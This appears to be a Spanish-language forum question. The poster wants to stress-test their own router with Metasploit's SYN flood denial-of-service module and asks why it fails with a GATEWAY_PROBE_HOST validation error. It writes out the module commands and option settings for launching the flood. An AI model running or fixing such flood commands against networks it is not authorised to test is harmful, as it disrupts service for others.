Quería realizar pruebas de estrés en mi enrutador usando Metasploit para realizar un ataque TCP syn Denial Of Service . He usado los siguientes comandos:
use auxiliary/dos/tcp/synflood
set rhost 192.168.65.204
(este es mi enrutador ip)
show options
mostró esto:
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
NUM no Number of SYNs to send (else unlimited)
RHOST 192.168.65.204 yes The target address
RPORT 80 yes The target port
SHOST no The spoofable source address (else randomizes)
SNAPLEN 65535 yes The number of bytes to capture
SPORT no The source port (else randomizes)
TIMEOUT 500 yes The number of seconds to wait for new data
Y cuando ejecuté el comando run
, se produjo el siguiente error:
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: GATEWAY_PROBE_HOST.
¿Alguien puede explicar qué significa y cómo corregir este error?